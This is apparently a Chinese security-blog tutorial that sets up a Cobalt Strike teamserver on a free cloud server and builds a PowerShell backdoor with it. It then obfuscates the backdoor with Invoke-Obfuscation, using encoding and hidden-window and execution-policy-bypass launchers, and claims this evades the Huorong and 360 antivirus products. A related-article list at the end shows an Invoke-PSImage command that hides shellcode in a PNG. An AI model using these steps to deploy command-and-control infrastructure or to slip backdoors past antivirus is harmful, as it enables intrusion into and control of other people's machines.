CS 公网配置及 Invoke-Obfuscation Bypass [火绒&360]

sugar2020-12-28 18:14:02

前言

今天本来想做个PS1的免杀,但做的时候要用到cobaltstrike来生成ps1后门

刚开始的时候并不知道cobaltstrike是一个用于团队项目的工具,所以过程中出现了很多问题。

为了让大家熟悉cobaltstrike的运行流程

感觉还是很有必要写一篇有关cobaltstrike公网配置的文章。

顺便讲一下一个很不错的免杀脚本

新版本的CS要配合linux服务端才能运行起来。

网上讲CS4.0的文章很多,但是讲的都很不尽人意,都是私人内网使用的介绍,并没有在公网上实现完整的运行流程。

很多小白(像我似的死活不肯买服务器,映射派作风),因为映射很便宜嘛。所以思路习惯固化在映射上,什么监听配置首先都往内网映射上想。

当然,如果你告诉我你想用花生壳是来搞cobaltstrike!

劝你还是早早放弃。(原因不想多解释 你们能搞出来说明你们NB)

所以我也是拿出半天的时间,进行了一下从零开始如何使用服务器的相关操作。

当然啦!作为资深白嫖党买服务器是不可能的 这辈子都不可能的~

就算抓一台linux也不舍得买 哈哈哈哈(开个小玩笑o( ̄▽ ̄)o)

本着白嫖到底的原则,发现腾讯云可以白嫖一台linux的服务器。

大家可以自己去看一下:关注公众号后 就会送你台服务器(很香的呦~)

图片

图片

腾讯云利用ssh协议可以直接登录到终端,账号root 密码:在邮箱里

登陆后在终端进行CS的配置:

一.安装JAVA

访问:https://www.oracle.com/java/technologies/j...

下载X64压缩包

jdk-8u202-linux-x64.tar.gz

将压缩包放到phpstudy本地WWW文件夹中(我是开的映射phpstudy)

切记不要直接wget下载地址!!!否则无法运行CS

然后服务器终端运行指令:

wget 映射的公网IP/jdk-8u202-linux-x64.tar.gz

2. 解压缩文件并移动至/opt

  1. tar -xzvf jdk-8u271-linux-x64.tar.gz

  2. mv jdk1.8.0_202 /opt

  3. cd /opt/jdk1.8.0_202

3. 设置环境变量

执行 vim ~/.bashrc , 按”i”并添加下列内容

  1. # install JAVA JDK

  2. export JAVA_HOME=/opt/jdk1.8.0_202

  3. export CLASSPATH=.:${JAVA_HOME}/lib

  4. export PATH=${JAVA_HOME}/bin:$PATH

保存退出 按ESC后再shift+: 输入wq

4. 安装并注册

执行:

  1. update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_202/bin/java 1

  2. update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_202/bin/javac 1

  3. update-alternatives --set java /opt/jdk1.8.0_202/bin/java

  4. update-alternatives --set javac /opt/jdk1.8.0_202/bin/javac

查看结果:

复制代码

  1. update-alternatives --config java

  2. update-alternatives --config javac

二.安装cobaltstrike


依然是wget访问本地phpstudy映射到公网的IP下载

  1. wget xxx.cc/cs4.zip

  2. mkdir cs4 //创建一个文件夹

  3. mv cs4.zip cs4

  4. cd cs4

  5. unzip cs4.zip //解压密码cs4

  6. chmod a+x teamserver //貌似服务器终端上不需要提权

  7. ln -s /opt/jdk1.8.0_202/bin/keytool /usr/bin //这一步需要加软链接 很关键

  8. ./teamserver 公网IP CS密码

服务端就上线了!

图片

客户端:

windows下直接双击start.bat //记得安装JAVA 要不然打不开

linux下启动客户端:java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

图片

设置监听:

映射是死活设置不出来的!!!

图片

图片

生成Payload:

图片

图片

图片

Invoke-Obfuscation免杀

这个不得不提,因为他实在是太好用了!一直过一切杀软!!!

图片

管理权限运行:Set-ExecutionPolicy Unrestricted

图片

  1. Import-Module./Invoke-Obfuscation.psd1

  2. Invoke-Obfuscation

图片

  1. set scriptpath C:\Users\Administrator\Desktop\1.ps1

  2. encoding

  3. 1

图片

输出文件

out shell.ps1

测试免杀效果

完美绕过火绒和360全家桶 就问你舒不舒服?

图片

测试payload稳定性:

以学院靶场为例 稳定运行

图片

Invoke-Obfuscation免杀拓展:

Invoke-Obfuscation免杀有多种编码格式 当然也有多种运行方式

输入launcher

选择ps

我们可以看到有多种运行方式

  1. [*]启动程序\PS\0无执行标志

  2. [*]启动器\PS\1-NoExit

  3. [*]启动器\PS\2-非交互

  4. [*]启动器\PS\3-NoLogo

  5. [*]启动程序\PS\4-NoProfile

  6. [*]启动器\PS\5-命令

  7. [*]启动器\PS\6-窗口样式隐藏

  8. [*]启动器\PS\7-绕过执行策略

  9. [*]启动器\PS\8-Wow64(到路径32位父进程)

  10. 选择6,7实现隐藏和绕过执行策略执行效果很不错的呦!

  11. 更多操作等你们发现~

图片

原创:https://mp.weixin.qq.com/s/AX8-1_Lnx1zefsr...

原文链接:aj545302905 掌控安全EDU

免杀ps
本作品采用《CC 协议》,转载必须注明作者和本文链接
这是一款基于java开发Windows的内网信息收集、利用工具
前言本篇文章将演示利用隐写术将 Shellcode 隐写入 PNG 图片 RGB 像素中,从而隐藏后门代码,并进行远程加载控制目标主机。Invoke-PSImage -Script .\payload.ps1 -Image .\origin.jpg -Out .\shell.png -Web
最近在研究这一块的知识,说到肯定就逃不过沙箱。对于沙箱的通俗理解就是一个安全的箱子,这个箱子能够模拟出软件执行苏需要的环境(如模拟虚拟机环境),通过hook跳转到自己的函数进行行为分析。所以我们的后门文件想要更好的躲避软的查杀,首先肯定要做好反调试才能在对抗软时后顾无忧。本文基于自己学习过程中的一些知识进行了总结,不足之处还请师傅们提出。
0X01起源在攻防演练中通过运行恶意代码连接C2是最常用的手段,但是由于对抗程度的提升。以360、天擎为代表的杀毒软件针对信任链的检测,已经变得愈来愈成熟。这里我们可以理解为,攻击者通过利用"白加黑"这种攻击方法。当攻击者通过社工钓鱼的手段,使得目标下载恶意的文件到目标自己的计算机上,并点击运行白文件时,该文件会在运行时执行恶意DLL。
顾名思义,无需将恶意文件传到目标服务器/机器上,直接利用powershell的特性加载到内存执行。为了在红队行动中更隐蔽的实施攻击以及横向移动,同时还可以解决目标不出网只能通过dns上线时的棘手问题,利用powershell可以避免一行行echo。
知识汇总
2021-08-25 23:11:00
知识汇总
powershell之路
2021-07-12 21:46:00
Windows PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能
前言最近在研究这一块的知识,说到肯定就逃不过沙箱。所以我们的后门文件想要更好的躲避软的查杀,首先肯定要做好反调试才能在对抗软时后顾无忧。本文基于自己学习过程中的一些知识进行了总结,不足之处还请师傅们提出。
随着设备不断的升级改进,USB 能够连接到许多不同的设备,包括鼠标、键盘、相机、摄像头、无线网络设备等。
sugar
暂无描述